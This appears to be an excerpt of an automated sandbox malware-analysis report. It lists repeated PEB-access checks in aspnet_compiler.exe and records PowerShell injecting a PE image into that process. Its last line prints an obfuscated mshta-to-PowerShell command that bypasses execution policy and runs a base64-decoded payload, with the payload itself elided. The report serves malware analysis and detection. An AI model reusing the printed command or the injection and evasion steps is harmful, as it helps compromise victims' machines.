                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAA352 mov eax, dword ptr fs:[00000030h]12_2_01AAA352
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A88350 mov ecx, dword ptr fs:[00000030h]12_2_01A88350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6035C mov eax, dword ptr fs:[00000030h]12_2_01A6035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6035C mov eax, dword ptr fs:[00000030h]12_2_01A6035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6035C mov eax, dword ptr fs:[00000030h]12_2_01A6035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6035C mov ecx, dword ptr fs:[00000030h]12_2_01A6035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6035C mov eax, dword ptr fs:[00000030h]12_2_01A6035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6035C mov eax, dword ptr fs:[00000030h]12_2_01A6035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A762A0 mov eax, dword ptr fs:[00000030h]12_2_01A762A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A762A0 mov ecx, dword ptr fs:[00000030h]12_2_01A762A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A762A0 mov eax, dword ptr fs:[00000030h]12_2_01A762A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A762A0 mov eax, dword ptr fs:[00000030h]12_2_01A762A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A762A0 mov eax, dword ptr fs:[00000030h]12_2_01A762A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A762A0 mov eax, dword ptr fs:[00000030h]12_2_01A762A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A60283 mov eax, dword ptr fs:[00000030h]12_2_01A60283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A60283 mov eax, dword ptr fs:[00000030h]12_2_01A60283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A60283 mov eax, dword ptr fs:[00000030h]12_2_01A60283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1E284 mov eax, dword ptr fs:[00000030h]12_2_01A1E284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1E284 mov eax, dword ptr fs:[00000030h]12_2_01A1E284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F02A0 mov eax, dword ptr fs:[00000030h]12_2_019F02A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F02A0 mov eax, dword ptr fs:[00000030h]12_2_019F02A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA2C3 mov eax, dword ptr fs:[00000030h]12_2_019EA2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA2C3 mov eax, dword ptr fs:[00000030h]12_2_019EA2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA2C3 mov eax, dword ptr fs:[00000030h]12_2_019EA2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA2C3 mov eax, dword ptr fs:[00000030h]12_2_019EA2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA2C3 mov eax, dword ptr fs:[00000030h]12_2_019EA2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F02E1 mov eax, dword ptr fs:[00000030h]12_2_019F02E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F02E1 mov eax, dword ptr fs:[00000030h]12_2_019F02E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F02E1 mov eax, dword ptr fs:[00000030h]12_2_019F02E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D823B mov eax, dword ptr fs:[00000030h]12_2_019D823B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6259 mov eax, dword ptr fs:[00000030h]12_2_019E6259
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DA250 mov eax, dword ptr fs:[00000030h]12_2_019DA250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A90274 mov eax, dword ptr fs:[00000030h]12_2_01A90274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A68243 mov eax, dword ptr fs:[00000030h]12_2_01A68243
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A68243 mov ecx, dword ptr fs:[00000030h]12_2_01A68243
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D826B mov eax, dword ptr fs:[00000030h]12_2_019D826B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E4260 mov eax, dword ptr fs:[00000030h]12_2_019E4260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E4260 mov eax, dword ptr fs:[00000030h]12_2_019E4260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E4260 mov eax, dword ptr fs:[00000030h]12_2_019E4260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A605A7 mov eax, dword ptr fs:[00000030h]12_2_01A605A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A605A7 mov eax, dword ptr fs:[00000030h]12_2_01A605A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A605A7 mov eax, dword ptr fs:[00000030h]12_2_01A605A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A045B1 mov eax, dword ptr fs:[00000030h]12_2_01A045B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A045B1 mov eax, dword ptr fs:[00000030h]12_2_01A045B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E2582 mov eax, dword ptr fs:[00000030h]12_2_019E2582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E2582 mov ecx, dword ptr fs:[00000030h]12_2_019E2582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A14588 mov eax, dword ptr fs:[00000030h]12_2_01A14588
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1E59C mov eax, dword ptr fs:[00000030h]12_2_01A1E59C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]12_2_01A0E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]12_2_01A0E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]12_2_01A0E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]12_2_01A0E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]12_2_01A0E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]12_2_01A0E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]12_2_01A0E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]12_2_01A0E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1C5ED mov eax, dword ptr fs:[00000030h]12_2_01A1C5ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1C5ED mov eax, dword ptr fs:[00000030h]12_2_01A1C5ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E65D0 mov eax, dword ptr fs:[00000030h]12_2_019E65D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1E5CF mov eax, dword ptr fs:[00000030h]12_2_01A1E5CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1E5CF mov eax, dword ptr fs:[00000030h]12_2_01A1E5CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1A5D0 mov eax, dword ptr fs:[00000030h]12_2_01A1A5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0EB20 mov eax, dword ptr fs:[00000030h]12_2_01A0EB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA8B28 mov eax, dword ptr fs:[00000030h]12_2_01AA8B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA8B28 mov eax, dword ptr fs:[00000030h]12_2_01AA8B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5EB1D mov eax, dword ptr fs:[00000030h]12_2_01A5EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DCB7E mov eax, dword ptr fs:[00000030h]12_2_019DCB7E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A76B40 mov eax, dword ptr fs:[00000030h]12_2_01A76B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A76B40 mov eax, dword ptr fs:[00000030h]12_2_01A76B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AAAB40 mov eax, dword ptr fs:[00000030h]12_2_01AAAB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A88B42 mov eax, dword ptr fs:[00000030h]12_2_01A88B42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8EB50 mov eax, dword ptr fs:[00000030h]12_2_01A8EB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A36AA4 mov eax, dword ptr fs:[00000030h]12_2_01A36AA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EEA80 mov eax, dword ptr fs:[00000030h]12_2_019EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AB4A80 mov eax, dword ptr fs:[00000030h]12_2_01AB4A80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A18A90 mov edx, dword ptr fs:[00000030h]12_2_01A18A90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E8AA0 mov eax, dword ptr fs:[00000030h]12_2_019E8AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E8AA0 mov eax, dword ptr fs:[00000030h]12_2_019E8AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E0AD0 mov eax, dword ptr fs:[00000030h]12_2_019E0AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1AAEE mov eax, dword ptr fs:[00000030h]12_2_01A1AAEE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1AAEE mov eax, dword ptr fs:[00000030h]12_2_01A1AAEE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A36ACC mov eax, dword ptr fs:[00000030h]12_2_01A36ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A36ACC mov eax, dword ptr fs:[00000030h]12_2_01A36ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A36ACC mov eax, dword ptr fs:[00000030h]12_2_01A36ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A14AD0 mov eax, dword ptr fs:[00000030h]12_2_01A14AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A14AD0 mov eax, dword ptr fs:[00000030h]12_2_01A14AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CA24 mov eax, dword ptr fs:[00000030h]12_2_01A1CA24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0EA2E mov eax, dword ptr fs:[00000030h]12_2_01A0EA2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A04A35 mov eax, dword ptr fs:[00000030h]12_2_01A04A35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A04A35 mov eax, dword ptr fs:[00000030h]12_2_01A04A35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CA38 mov eax, dword ptr fs:[00000030h]12_2_01A1CA38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6CA11 mov eax, dword ptr fs:[00000030h]12_2_01A6CA11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0A5B mov eax, dword ptr fs:[00000030h]12_2_019F0A5B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0A5B mov eax, dword ptr fs:[00000030h]12_2_019F0A5B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8EA60 mov eax, dword ptr fs:[00000030h]12_2_01A8EA60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CA6F mov eax, dword ptr fs:[00000030h]12_2_01A1CA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CA6F mov eax, dword ptr fs:[00000030h]12_2_01A1CA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CA6F mov eax, dword ptr fs:[00000030h]12_2_01A1CA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5CA72 mov eax, dword ptr fs:[00000030h]12_2_01A5CA72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5CA72 mov eax, dword ptr fs:[00000030h]12_2_01A5CA72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A16DA0 mov eax, dword ptr fs:[00000030h]12_2_01A16DA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA8DAE mov eax, dword ptr fs:[00000030h]12_2_01AA8DAE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA8DAE mov eax, dword ptr fs:[00000030h]12_2_01AA8DAE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AB4DAD mov eax, dword ptr fs:[00000030h]12_2_01AB4DAD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CDB1 mov ecx, dword ptr fs:[00000030h]12_2_01A1CDB1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CDB1 mov eax, dword ptr fs:[00000030h]12_2_01A1CDB1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CDB1 mov eax, dword ptr fs:[00000030h]12_2_01A1CDB1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A08DBF mov eax, dword ptr fs:[00000030h]12_2_01A08DBF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A08DBF mov eax, dword ptr fs:[00000030h]12_2_01A08DBF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A00DE1 mov eax, dword ptr fs:[00000030h]12_2_01A00DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0CDF0 mov eax, dword ptr fs:[00000030h]12_2_01A0CDF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0CDF0 mov ecx, dword ptr fs:[00000030h]12_2_01A0CDF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A80DF0 mov eax, dword ptr fs:[00000030h]12_2_01A80DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A80DF0 mov eax, dword ptr fs:[00000030h]12_2_01A80DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D6DF6 mov eax, dword ptr fs:[00000030h]12_2_019D6DF6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A64DD7 mov eax, dword ptr fs:[00000030h]12_2_01A64DD7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match File source: amsi32_6592.amsi.csv, type: OTHER
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 1060008
                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'<base64 payload elided>'+[chaR]34+'))')))"
